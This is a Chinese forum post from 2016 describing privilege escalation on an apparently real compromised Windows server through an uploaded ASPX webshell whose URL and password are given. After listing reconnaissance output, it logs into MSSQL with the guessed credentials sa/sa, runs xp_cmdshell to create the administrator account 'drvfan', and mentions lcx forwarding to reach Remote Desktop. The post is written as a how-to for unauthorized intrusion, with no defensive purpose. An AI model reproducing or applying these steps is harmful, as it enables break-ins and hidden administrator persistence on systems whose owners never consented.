yun 发表于 2016-10-15 15:46:49

利用MSSQL提权实例

Shell:http://xxx.com/admin/Databackup/1.aspxPass:123123ServerIP : 内网ip,外网ipHostName: TFSEC-87343FD20OSVersion : Microsoft Windows NT 5.2.3790 Service Pack 2IISVersion : Microsoft-IIS/6.0PATH_TRANSLATED: C:\TongFangYunFanWebSite\admin\Databackup\1.aspx IDProcess MemorySize Threads2224360tray 3809280 243460sqlmangr 5652480 23552VMwareTray 1335296 1 user可执行cmd 用户名                会话名             ID 状态    空闲时间   登录时间administrator         console             0 运行中          . 2011-3-27 12:33tfcloudweb                                1  唱片        无    2011-5-25 9:31 \\TFSEC-87343FD20的用户帐户 -------------------------------------------------------------------------------1                        Administrator            ASPNET                   Guest                    IUSR_TFSEC-87343FD20     IWAM_TFSEC-87343FD20     SUPPORT_388945a0         TfcloudWeb TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING 上面是搜集到的服务器的资料,下面是初步分析:服务器位于内网,开放3389,但无法直接连接,需要转发。服务器装了360、MSSQL,是个虚拟机。User组可以调用cmd.exe。现在有2个用户在登录服务器,一个是administrator,另一个是tfcloudweb,另外,还发现服务器上有一个名为1的用户,看了下权限,是administrators组,很明显是前人进去过了,并且有很大可能是用户名为1,密码也为1的,这时就可以直接用Lcx转发,然后连上3389,用1登录了,后来证实这个用户确实密码是1,这是取巧的方法,这里不做讨论。我的思路是,了解了基本情况后,传了pr和Churrasco上去,发现都执行的时候都没有回显,这说明可能是这2个漏洞都被打了补丁,也有可能是我传的目录没有执行权限。但是我换了好几个目录执行都没有回显,这说明这2个漏洞确实被补了,这条路断掉。前边说过,服务器装的有MSSQL,这里就看看能不能利用。很多web都自带MSSQL提权功能的,这个shell的截图为:
文本框“ConnString”里写的是连接语句,这里默认连接的是本地数据库,用户名是sa,密码为空,我直接单击了“submit”按钮,看能不能连上,回显如图:没有回显,说明连接失败。
再试试密码是不是sa,如图:
Submit,如图:可以看到,有回显了,这说明我们连接成功,MSSQL的密码就是sa,好了,现在看看可以不可以执行DOS命令。
单击“SQL_Dir”,如图:
直接单击“Dir”,如图:回显成功,说明可以执行DOS命令,这样就好办了。
直接用MSSQL就可以添加用户了,单击“SA_Exec”,如图:
我们在这个下拉框里选择“XP_cmdshell exec”,如图:
这里就可以执行DOS命令了,直接把页面上显示的默认语句的net user换成net user drvfan drvfan /add,单击“SA_Exec”执行即可,
命令成功完成,说明添加成功,再执行:Netlocalgroup administrators drvfan /add
就把用户drvfan添加到管理员组了,如图:
现在来看一下服务器上都有哪些用户:
可以看到,drvfan已经添加上了,再看看drvfan是不是管理员:可以看到,drvfan已经是管理员了。
OK,提权成功,剩下的就是lcx转发,然后连接了。这里就不写了,具体参考lcx使用方法即可。
另外说明一下,每个人用的web不一样,具体的步骤也不一样,你比如我前边单击“Sql Tools”进入到了MSSQL的连接界面,在你的shell里可能就不是单击这个按钮,而是单击别的按钮,这是一点区别。但是方法和原理都是一样的。完毕。
页: [1]
查看完整版本: 利用MSSQL提权实例